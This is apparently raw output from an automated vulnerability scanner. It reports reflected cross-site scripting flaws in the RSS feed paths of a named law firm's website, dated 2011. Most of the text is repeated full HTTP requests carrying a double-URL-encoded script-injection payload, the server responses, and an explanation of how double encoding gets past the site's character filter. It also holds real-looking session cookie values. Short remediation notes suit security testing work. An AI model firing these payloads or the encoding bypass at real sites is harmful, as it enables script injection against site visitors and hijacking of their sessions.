GET /rss/practices/Appellate3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c was submitted in the REST URL parameter 4. This input was echoed as 2c988"><script>alert(1)</script>407b643948c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Appellate/rss.xml2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0 was submitted in the REST URL parameter 1. This input was echoed as 2da3e"><script>alert(1)</script>93729e4d7b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0/practices/Aviation/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5 was submitted in the REST URL parameter 2. This input was echoed as ed7d3"><script>alert(1)</script>dd1cc3a52a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5/Aviation/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296 was submitted in the REST URL parameter 3. This input was echoed as d5cb1"><script>alert(1)</script>7ae874bc296 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Aviationd5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 was submitted in the REST URL parameter 4. This input was echoed as 2f5ee"><script>alert(1)</script>49810451264 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Aviation/rss.xml2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e was submitted in the REST URL parameter 1. This input was echoed as e654b"><script>alert(1)</script>d4d67e0d85e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rsse654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e/practices/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294 was submitted in the REST URL parameter 2. This input was echoed as 53a9f"><script>alert(1)</script>e2b7ff89294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229 was submitted in the REST URL parameter 3. This input was echoed as 705db"><script>alert(1)</script>4b5b4bac229 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Bankruptcy__Financial_Restructuring705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 was submitted in the REST URL parameter 4. This input was echoed as a7f92"><script>alert(1)</script>7324d443b57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Bankruptcy__Financial_Restructuring/rss.xmla7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150 was submitted in the REST URL parameter 1. This input was echoed as 413f8"><script>alert(1)</script>89fd6730150 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150/practices/Communications/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e was submitted in the REST URL parameter 2. This input was echoed as 3fe4c"><script>alert(1)</script>24c5c30db8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e/Communications/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2 was submitted in the REST URL parameter 3. This input was echoed as 21c62"><script>alert(1)</script>da39f0f31a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Communications21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a was submitted in the REST URL parameter 4. This input was echoed as c659f"><script>alert(1)</script>72b7507567a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Communications/rss.xmlc659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650 was submitted in the REST URL parameter 1. This input was echoed as f366f"><script>alert(1)</script>a6a0233650 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssf366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650/practices/Corporate/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb was submitted in the REST URL parameter 2. This input was echoed as 8174b"><script>alert(1)</script>fb0e9ce51eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb/Corporate/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b was submitted in the REST URL parameter 3. This input was echoed as 114fe"><script>alert(1)</script>550bbc6f87b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Corporate114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 was submitted in the REST URL parameter 4. This input was echoed as 6f9cb"><script>alert(1)</script>495b8d11a77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Corporate/rss.xml6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f was submitted in the REST URL parameter 1. This input was echoed as d782d"><script>alert(1)</script>d2f1002c72f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssd782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f/practices/Election_Law__Government_Ethics/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232 was submitted in the REST URL parameter 2. This input was echoed as 8ddc1"><script>alert(1)</script>11d8c833232 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
